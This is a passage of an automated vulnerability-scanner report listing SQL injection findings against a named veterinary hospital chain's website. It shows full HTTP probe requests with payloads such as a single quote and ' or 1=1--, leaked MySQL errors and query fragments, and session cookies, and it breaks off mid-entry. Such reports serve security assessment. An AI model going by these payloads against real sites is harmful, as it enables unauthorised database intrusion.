select ims_HospitalAddress.*, ims_HospitalCustomService.*, ims_HospitalFax.*, ims_HospitalOtherContact.*, ims_HospitalCustomService.*, ...[SNIP]... left join ims_hospitallocation on ims_hospitallocation.i_hospital_id=ims_Hospital.i_hospital_id where ims_Hospital.i_short_name='main'' limit 1
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''main'' limit 1' at line 31
1.6. http://www.vcahospitals.com/main/img/sema-landing.jpg [REST URL parameter 1]
Summary
Severity: High
Confidence: Firm
Host: http://www.vcahospitals.com
Path: /main/img/sema-landing.jpg
Issue detail
The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the REST URL parameter 1, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present. The database appears to be MySQL.
Remediation detail
The application should handle errors gracefully and prevent SQL error messages from being returned in responses.
Request
GET /main' /img/sema-landing.jpg HTTP/1.1 Host: www.vcahospitals.com Proxy-Connection: keep-alive Referer: http://www.vcahospitals.com/main/offer?r=E13&utm_source=google&utm_medium=ppc&utm_term=vca%20antech&utm_campaign=e13geotarget_e13branded&gclid=CNrfoemwt6cCFcbd4Aod8keVAw Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: PHPSESSID=5mvavkll88lopmn51r8r0kids0
Response
HTTP/1.1 404 Not Found Date: Sat, 05 Mar 2011 12:11:54 GMT Server: Apache/2.2.15 (Win32) PHP/5.2.14 X-Powered-By: PHP/5.2.14 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Status: 404 Not Found Content-Length: 2238 Content-Type: text/html select ims_HospitalAddress.*, ims_HospitalCustomService.*, ims_HospitalFax.*, ims_HospitalOtherContact.*, ims_HospitalCustomService.*, ...[SNIP]... left join ims_hospitallocation on ims_hospitallocation.i_hospital_id=ims_Hospital.i_hospital_id where ims_Hospital.i_short_name='main'' limit 1You have an error in your SQL syntax ; check the manual that corresponds to your MySQL server version for the right syntax to use near ''main'' limit 1' at line 31
1.7. http://www.vcahospitals.com/main/offer [REST URL parameter 1]
Summary
Severity: High
Confidence: Firm
Host: http://www.vcahospitals.com
Path: /main/offer
Issue detail
The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. The payload 48012625'%20or%201%3d1--%20 was submitted in the REST URL parameter 1, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present. The database appears to be MySQL.
Remediation detail
The application should handle errors gracefully and prevent SQL error messages from being returned in responses.
Request
GET /main48012625'%20or%201%3d1--%20 /offer?addr=&city=&date=1307084400&email=&fname=&formtype=CORP&guid=0488BA99-5545-4992-912E-EE3E92538798&ipaddress=173.193.214.243&lname=&newmex=0&optin=&other=&petage=&petname=&pettype=&phone=&referer=&state=&submit=Get+FREE+Coupon&token=aa13a28e1773f137e31261bccc5c24bc&tollfree=866-825-8416&uri=http:%2f%2fwww.vcahospitals.com%2fmain%2foffer%3faddr%3d%26city%3d%26date%3d1307084400%26email%3d%26fname%3d%26formtype%3dCORP%26guid%3d95D5FB0B-779F-4D18-9C9E-501AD398C559%26ipaddress%3d173.193.214.243%26lname%3d%26newmex%3d0%26optin%3d%26other%3d%26petage%3d%26petname%3d%26pettype%3d%26phone%3d%26referer%3d%26state%3d%26submit%3dGet%2bFREE%2bCoupon%26token%3ddda68e64d460e98531171085a5a8ad78%26tollfree%3d866-825-8416%26uri%3dhttp%253a%252f%252fwww.vcahospitals.com%252fmain%252foffer%253faddr%253d%2526city%253d%2526date%253d1307084400%2526email%253d%2526fname%253d%2526formtype%253dCORP%2526guid%253dD4DE5467-1E6D-4C3E-80D6-E52DB1140F3A%2526ipaddress%253d173.193.214.243%2526lname%253d%2526newmex%253d0%2526optin%253d%2526other%253d%2526petage%253d%2526petname%253d%2526pettype%253d%2526phone%253d%2526referer%253d%2526state%253d%2526submit%253dGet%252bFREE%252bCoupon%2526token%253dc6268853c430a181c06a3eda75dae1a1%2526tollfree%253d866-825-8416%2526uri%253dhttp%25253a%25252f%25252fwww.vcahospitals.com%25252fmain%25252foffer%25253faddr%25253d%252526city%25253d%252526date%25253d1307084400%252526email%25253d%252526fname%25253d%252526formtype%25253dCORP%252526guid%25253d6770E3F2-2A04-4662-AEB3-FE70D3111F6D%252526ipaddress%25253d173.193.214.243%252526lname%25253d%252526newmex%25253d0%252526optin%25253d%252526other%25253d%252526petage%25253d%252526petname%25253d%252526pettype%25253d%252526phone%25253d%252526referer%25253d%252526state%25253d%252526submit%25253dGet%25252bFREE%25252bCoupon%252526token%25253dcdbd8b098f8070e3c19207ef06a5e6e1%252526tollfree%25253d866-825-8416%252526uri%25253dhttp%2525253a%2525252f%2525252fwww.vcahospitals.com%2525252fmain%
2525252foffer%2525253faddr%2525253d%25252526city%2525253d%25252526date%2525253d1307084400%25252526email%2525253d%25252526fname%2525253d%25252526formtype%2525253dCORP%25252526guid%2525253dFBBB127E-9283-4C9A-8A61-A34D07FC7146%25252526ipaddress%2525253d173.193.214.243%25252526lname%2525253d%25252526newmex%2525253d0%25252526optin%2525253d%25252526other%2525253d%25252526petage%2525253d%25252526petname%2525253d%25252526pettype%2525253d%25252526phone%2525253d%25252526referer%2525253d%25252526state%2525253d%25252526submit%2525253dGet%2525252bFREE%2525252bCoupon%25252526token%2525253d81c834ba6ebffe11ddefbac1e3647bda%25252526tollfree%2525253d866-825-8416%25252526uri%2525253dhttp%252525253a%252525252f%252525252fwww.vcahospitals.com%252525252fmain%252525252foffer%25252526useragent%2525253dMozilla%252525252f4.0%2525252b(compatible%252525253b%2525252bMSIE%2525252b6.0%252525253b%2525252bWindows%2525252bNT%2525252b5.1%252525253b%2525252bSV1%252525253b%2525252b.NET%2525252bCLR%2525252b1.1.4322)%25252526variant%2525253d%25252526zip%2525253d%252526useragent%25253dMozilla%2525252f4.0%25252b(compatible%2525253b%25252bMSIE%25252b6.0%2525253b%25252bWindows%25252bNT%25252b5.1%2525253b%25252bSV1%2525253b%25252b.NET%25252bCLR%25252b1.1.4322)%252526variant%25253d%252526zip%25253d%2526useragent%253dMozilla%25252f4.0%252b(compatible%25253b%252bMSIE%252b6.0%25253b%252bWindows%252bNT%252b5.1%25253b%252bSV1%25253b%252b.NET%252bCLR%252b1.1.4322)%2526variant%253d%2526zip%253d%26useragent%3dMozilla%252f4.0%2b(compatible%253b%2bMSIE%2b6.0%253b%2bWindows%2bNT%2b5.1%253b%2bSV1%253b%2b.NET%2bCLR%2b1.1.4322)%26variant%3d%26zip%3d&useragent=Mozilla%2f4.0+(compatible%3b+MSIE+6.0%3b+Windows+NT+5.1%3b+SV1%3b+.NET+CLR+1.1.4322)&variant=&zip= HTTP/1.1 Accept: */* Accept-Language: en-US Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E) 
Proxy-Connection: Keep-Alive Host: www.vcahospitals.com
Response
HTTP/1.1 200 OK Date: Sat, 05 Mar 2011 12:19:19 GMT Server: Apache/2.2.15 (Win32) PHP/5.2.14 X-Powered-By: PHP/5.2.14 Set-Cookie: PHPSESSID=ahpca9ejckksr3056ippblins3; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Length: 2261 Content-Type: text/html select ims_HospitalAddress.*, ims_HospitalCustomService.*, ims_HospitalFax.*, ims_HospitalOtherContact.*, ims_HospitalCustomService.*, ...[SNIP]... ims_hospitallocation on ims_hospitallocation.i_hospital_id=ims_Hospital.i_hospital_id where ims_Hospital.i_short_name='main48012625'%20or%201%3d1--%20' limit 1You have an error in your SQL syntax ; check the manual that corresponds to your MySQL server version for the right syntax to use near '%20' limit 1' at line 31
1.8. http://www.vcahospitals.com/main/offer [REST URL parameter 1]
Summary
Severity: High
Confidence: Certain
Host: http://www.vcahospitals.com
Path: /main/offer
Issue detail
The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present. The database appears to be MySQL.
Remediation detail
The application should handle errors gracefully and prevent SQL error messages from being returned in responses.
Request 1
GET /main' /offer?r=E13&utm_source=google&utm_medium=ppc&utm_term=vca%20antech&utm_campaign=e13geotarget_e13branded&gclid=CNrfoemwt6cCFcbd4Aod8keVAw HTTP/1.1 Host: www.vcahospitals.com Proxy-Connection: keep-alive Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response 1
HTTP/1.1 200 OK Date: Sat, 05 Mar 2011 12:05:10 GMT Server: Apache/2.2.15 (Win32) PHP/5.2.14 X-Powered-By: PHP/5.2.14 Set-Cookie: PHPSESSID=hq8rnqfmmvda2haj49mg0si302; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Length: 2238 Content-Type: text/html select ims_HospitalAddress.*, ims_HospitalCustomService.*, ims_HospitalFax.*, ims_HospitalOtherContact.*, ims_HospitalCustomService.*, ...[SNIP]... left join ims_hospitallocation on ims_hospitallocation.i_hospital_id=ims_Hospital.i_hospital_id where ims_Hospital.i_short_name='main'' limit 1You have an error in your SQL syntax ; check the manual that corresponds to your MySQL server version for the right syntax to use near ''main'' limit 1' at line 31
Request 2
GET /main'' /offer?r=E13&utm_source=google&utm_medium=ppc&utm_term=vca%20antech&utm_campaign=e13geotarget_e13branded&gclid=CNrfoemwt6cCFcbd4Aod8keVAw HTTP/1.1 Host: www.vcahospitals.com Proxy-Connection: keep-alive Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response 2
HTTP/1.1 302 Found Date: Sat, 05 Mar 2011 12:05:11 GMT Server: Apache/2.2.15 (Win32) PHP/5.2.14 X-Powered-By: PHP/5.2.14 Set-Cookie: PHPSESSID=ohksbkggjsps1t5j8gv02nt5p1; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Status: 404 Not Found Location: http://www.vcahospitals.com Content-Type: text/html Content-Length: 16281 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="conte...[SNIP]...
1.9. http://www.vcahospitals.com/main/offer/ [REST URL parameter 1]
Summary
Severity: High
Confidence: Certain
Host: http://www.vcahospitals.com
Path: /main/offer/
Issue detail
The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present. The database appears to be MySQL.
Remediation detail
The application should handle errors gracefully and prevent SQL error messages from being returned in responses.
Request 1
GET /main' /offer/?&optin=1&guid=EB9CB843-C06F-419A-A604-9D3CF6F5CC77&referer=http%3A%2F%2Fwww.vcahospitals.com%2Fmain%2Foffer%2Fthank-you.html%3F HTTP/1.1 Referer: http://www.vcahospitals.com/main/offer/thank-you.html? User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322) Cache-Control: no-cache Host: www.vcahospitals.com Cookie: PHPSESSID=1af1jedp03fokmt067uielfdf6 Accept-Encoding: gzip, deflate
Response 1
HTTP/1.1 200 OK Date: Sat, 05 Mar 2011 12:17:34 GMT Server: Apache/2.2.15 (Win32) PHP/5.2.14 X-Powered-By: PHP/5.2.14 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Length: 2238 Content-Type: text/html select ims_HospitalAddress.*, ims_HospitalCustomService.*, ims_HospitalFax.*, ims_HospitalOtherContact.*, ims_HospitalCustomService.*, ...[SNIP]... left join ims_hospitallocation on ims_hospitallocation.i_hospital_id=ims_Hospital.i_hospital_id where ims_Hospital.i_short_name='main'' limit 1You have an error in your SQL syntax ; check the manual that corresponds to your MySQL server version for the right syntax to use near ''main'' limit 1' at line 31
Request 2
GET /main'' /offer/?&optin=1&guid=EB9CB843-C06F-419A-A604-9D3CF6F5CC77&referer=http%3A%2F%2Fwww.vcahospitals.com%2Fmain%2Foffer%2Fthank-you.html%3F HTTP/1.1 Referer: http://www.vcahospitals.com/main/offer/thank-you.html? User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322) Cache-Control: no-cache Host: www.vcahospitals.com Cookie: PHPSESSID=1af1jedp03fokmt067uielfdf6 Accept-Encoding: gzip, deflate
Response 2
HTTP/1.1 302 Found Date: Sat, 05 Mar 2011 12:17:35 GMT Server: Apache/2.2.15 (Win32) PHP/5.2.14 X-Powered-By: PHP/5.2.14 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Status: 404 Not Found Location: http://www.vcahospitals.com Content-Type: text/html Content-Length: 16306 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="conte...[SNIP]...
1.10. http://www.vcahospitals.com/main/offer/ [REST URL parameter 1]
Summary
Severity: High
Confidence: Firm
Host: http://www.vcahospitals.com
Path: /main/offer/
Issue detail
The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. The payload 21204365'%20or%201%3d1--%20 was submitted in the REST URL parameter 1, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present. The database appears to be MySQL.
Remediation detail
The application should handle errors gracefully and prevent SQL error messages from being returned in responses.
Request
GET /main21204365'%20or%201%3d1--%20 /offer/?=3&optin=1&guid=EB9CB843-C06F-419A-A604-9D3CF6F5CC77&referer=http%3A%2F%2Fwww.vcahospitals.com%2Fmain%2Foffer%2Fthank-you.html%3F HTTP/1.1 Referer: http://www.vcahospitals.com/main/offer/thank-you.html? User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322) Cache-Control: no-cache Host: www.vcahospitals.com Accept-Encoding: gzip, deflate
Response
HTTP/1.1 200 OK Date: Sat, 05 Mar 2011 12:19:33 GMT Server: Apache/2.2.15 (Win32) PHP/5.2.14 X-Powered-By: PHP/5.2.14 Set-Cookie: PHPSESSID=o6doohfgvipr3saul15roodh63; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Length: 2261 Content-Type: text/html select ims_HospitalAddress.*, ims_HospitalCustomService.*, ims_HospitalFax.*, ims_HospitalOtherContact.*, ims_HospitalCustomService.*, ...[SNIP]... ims_hospitallocation on ims_hospitallocation.i_hospital_id=ims_Hospital.i_hospital_id where ims_Hospital.i_short_name='main21204365'%20or%201%3d1--%20' limit 1You have an error in your SQL syntax ; check the manual that corresponds to your MySQL server version for the right syntax to use near '%20' limit 1' at line 31
1.11. http://www.vcahospitals.com/main/offer/thank-you.html [REST URL parameter 1]
Summary
Severity: High
Confidence: Firm
Host: http://www.vcahospitals.com
Path: /main/offer/thank-you.html
Issue detail
The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the REST URL parameter 1, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present. The database appears to be MySQL.
Remediation detail
The application should handle errors gracefully and prevent SQL error messages from being returned in responses.
Request
POST /main' /offer/thank-you.html? HTTP/1.1 Referer: http://www.vcahospitals.com/main/offer User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322) Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Host: www.vcahospitals.com Cookie: PHPSESSID=1af1jedp03fokmt067uielfdf6 Accept-Encoding: gzip, deflate Proxy-Connection: Keep-Alive Content-Length: 429 fname=&lname=&addr=&city=&state=AK&zip=&phone=&email=&optin=on&pettype=&other=&petname=&petage=&variant=&token=917e022cccb7f727295d2ccceeb0579c&guid=2505B0C6-B6AA-4144-878F-54873D353284&referer=&uri=h...[SNIP]...
Response
HTTP/1.1 200 OK Date: Sat, 05 Mar 2011 12:22:46 GMT Server: Apache/2.2.15 (Win32) PHP/5.2.14 X-Powered-By: PHP/5.2.14 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Length: 2238 Content-Type: text/html select ims_HospitalAddress.*, ims_HospitalCustomService.*, ims_HospitalFax.*, ims_HospitalOtherContact.*, ims_HospitalCustomService.*, ...[SNIP]... left join ims_hospitallocation on ims_hospitallocation.i_hospital_id=ims_Hospital.i_hospital_id where ims_Hospital.i_short_name='main'' limit 1You have an error in your SQL syntax ; check the manual that corresponds to your MySQL server version for the right syntax to use near ''main'' limit 1' at line 31
1.12. http://www.vcahospitals.com/main/offer/thank-you.html [REST URL parameter 1]
Summary
Severity: High
Confidence: Certain
Host: http://www.vcahospitals.com
Path: /main/offer/thank-you.html
Issue detail
The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present. The database appears to be MySQL.
Remediation detail
The application should handle errors gracefully and prevent SQL error messages from being returned in responses.
Request 1
POST /main' /offer/thank-you.html? HTTP/1.1 Referer: http://www.vcahospitals.com/main/offer User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322) Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Host: www.vcahospitals.com Cookie: PHPSESSID=1af1jedp03fokmt067uielfdf6 Accept-Encoding: gzip, deflate Proxy-Connection: Keep-Alive Content-Length: 448 fname=&lname=&addr=&city=&state&zip=&phone=&email=&optin=on&pettype&other=&petname=&petage=&variant=&submit=Get+FREE+Coupon&token=917e022cccb7f727295d2ccceeb0579c&guid=2505B0C6-B6AA-4144-878F-54873D35...[SNIP]...
Response 1
HTTP/1.1 200 OK Date: Sat, 05 Mar 2011 12:25:07 GMT Server: Apache/2.2.15 (Win32) PHP/5.2.14 X-Powered-By: PHP/5.2.14 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Length: 2238 Content-Type: text/html select ims_HospitalAddress.*, ims_HospitalCustomService.*, ims_HospitalFax.*, ims_HospitalOtherContact.*, ims_HospitalCustomService.*, ...[SNIP]... left join ims_hospitallocation on ims_hospitallocation.i_hospital_id=ims_Hospital.i_hospital_id where ims_Hospital.i_short_name='main'' limit 1You have an error in your SQL syntax ; check the manual that corresponds to your MySQL server version for the right syntax to use near ''main'' limit 1' at line 31
Request 2
POST /main'' /offer/thank-you.html? HTTP/1.1 Referer: http://www.vcahospitals.com/main/offer User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322) Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Host: www.vcahospitals.com Cookie: PHPSESSID=1af1jedp03fokmt067uielfdf6 Accept-Encoding: gzip, deflate Proxy-Connection: Keep-Alive Content-Length: 448 fname=&lname=&addr=&city=&state&zip=&phone=&email=&optin=on&pettype&other=&petname=&petage=&variant=&submit=Get+FREE+Coupon&token=917e022cccb7f727295d2ccceeb0579c&guid=2505B0C6-B6AA-4144-878F-54873D35...[SNIP]...
Response 2
HTTP/1.1 302 Found Date: Sat, 05 Mar 2011 12:25:12 GMT Server: Apache/2.2.15 (Win32) PHP/5.2.14 X-Powered-By: PHP/5.2.14 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Status: 404 Not Found Location: http://www.vcahospitals.com Content-Type: text/html Content-Length: 8205 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="conte...[SNIP]...
1.13. http://www.vcahospitals.com/manhattan-veterinary-group/appt.html [REST URL parameter 1]
Summary
Severity: High
Confidence: Certain
Host: http://www.vcahospitals.com
Path: /manhattan-veterinary-group/appt.html
Issue detail
The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present. The database appears to be MySQL.
Remediation detail
The application should handle errors gracefully and prevent SQL error messages from being returned in responses.
Request 1
GET /manhattan-veterinary-group' /appt.html HTTP/1.1 Host: www.vcahospitals.com Proxy-Connection: keep-alive Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __utmz=107294085.1299327741.1.3.utmcsr=google|utmgclid=CNrfoemwt6cCFcbd4Aod8keVAw|utmccn=e13geotarget_e13branded|utmcmd=ppc|utmctr=vca%20antech; PHPSESSID=ftfoo7b6iv57j362dn8bjlodp6; __utma=107294085.1677130218.1299326665.1299326665.1299326665.1; __utmc=107294085; __utmb=107294085.7.10.1299326665
Response 1
HTTP/1.1 200 OK Date: Sat, 05 Mar 2011 12:46:39 GMT Server: Apache/2.2.15 (Win32) PHP/5.2.14 X-Powered-By: PHP/5.2.14 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Length: 2282 Content-Type: text/html select ims_HospitalAddress.*, ims_HospitalCustomService.*, ims_HospitalFax.*, ims_HospitalOtherContact.*, ims_HospitalCustomService.*, ...[SNIP]... oin ims_hospitallocation on ims_hospitallocation.i_hospital_id=ims_Hospital.i_hospital_id where ims_Hospital.i_short_name='manhattan-veterinary-group'' limit 1You have an error in your SQL syntax ; check the manual that corresponds to your MySQL server version for the right syntax to use near ''manhattan-veterinary-group'' limit 1' at line 31
Request 2
GET /manhattan-veterinary-group'' /appt.html HTTP/1.1 Host: www.vcahospitals.com Proxy-Connection: keep-alive Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __utmz=107294085.1299327741.1.3.utmcsr=google|utmgclid=CNrfoemwt6cCFcbd4Aod8keVAw|utmccn=e13geotarget_e13branded|utmcmd=ppc|utmctr=vca%20antech; PHPSESSID=ftfoo7b6iv57j362dn8bjlodp6; __utma=107294085.1677130218.1299326665.1299326665.1299326665.1; __utmc=107294085; __utmb=107294085.7.10.1299326665
Response 2
HTTP/1.1 302 Found Date: Sat, 05 Mar 2011 12:46:41 GMT Server: Apache/2.2.15 (Win32) PHP/5.2.14 X-Powered-By: PHP/5.2.14 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Status: 404 Not Found Location: http://www.vcahospitals.com Content-Type: text/html Content-Length: 20576 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="conte...[SNIP]...
1.14. http://www.vcahospitals.com/marshfield [REST URL parameter 1]
Summary
Severity: High
Confidence: Certain
Host: http://www.vcahospitals.com
Path: /marshfield
Issue detail
The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present. The database appears to be MySQL.
Remediation detail
The application should handle errors gracefully and prevent SQL error messages from being returned in responses.
Request 1
GET /marshfield' HTTP/1.1 Host: www.vcahospitals.com Proxy-Connection: keep-alive Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __utmz=107294085.1299327741.1.3.utmcsr=google|utmgclid=CNrfoemwt6cCFcbd4Aod8keVAw|utmccn=e13geotarget_e13branded|utmcmd=ppc|utmctr=vca%20antech; PHPSESSID=ftfoo7b6iv57j362dn8bjlodp6; UnicaNIODID=dbDjw98iApF-W2RGZUH; __utmx=107294085.; __utmxx=107294085.; __utma=107294085.1677130218.1299326665.1299326665.1299326665.1; __utmc=107294085; __utmb=107294085.15.10.1299326665
Response 1
HTTP/1.1 200 OK Date: Sat, 05 Mar 2011 12:47:06 GMT Server: Apache/2.2.15 (Win32) PHP/5.2.14 X-Powered-By: PHP/5.2.14 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Length: 2250 Content-Type: text/html select ims_HospitalAddress.*, ims_HospitalCustomService.*, ims_HospitalFax.*, ims_HospitalOtherContact.*, ims_HospitalCustomService.*, ...[SNIP]... left join ims_hospitallocation on ims_hospitallocation.i_hospital_id=ims_Hospital.i_hospital_id where ims_Hospital.i_short_name='marshfield'' limit 1You have an error in your SQL syntax ; check the manual that corresponds to your MySQL server version for the right syntax to use near ''marshfield'' limit 1' at line 31
Request 2
GET /marshfield'' HTTP/1.1 Host: www.vcahospitals.com Proxy-Connection: keep-alive Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __utmz=107294085.1299327741.1.3.utmcsr=google|utmgclid=CNrfoemwt6cCFcbd4Aod8keVAw|utmccn=e13geotarget_e13branded|utmcmd=ppc|utmctr=vca%20antech; PHPSESSID=ftfoo7b6iv57j362dn8bjlodp6; UnicaNIODID=dbDjw98iApF-W2RGZUH; __utmx=107294085.; __utmxx=107294085.; __utma=107294085.1677130218.1299326665.1299326665.1299326665.1; __utmc=107294085; __utmb=107294085.15.10.1299326665
Response 2
HTTP/1.1 302 Found Date: Sat, 05 Mar 2011 12:47:08 GMT Server: Apache/2.2.15 (Win32) PHP/5.2.14 X-Powered-By: PHP/5.2.14 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Status: 404 Not Found Location: http://www.vcahospitals.com Content-Type: text/html Content-Length: 9673 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Conte...[SNIP]...
1.15. http://www.vcahospitals.com/marshfield/appt.html [REST URL parameter 1]
Summary
Severity: High
Confidence: Certain
Host: http://www.vcahospitals.com
Path: /marshfield/appt.html
Issue detail
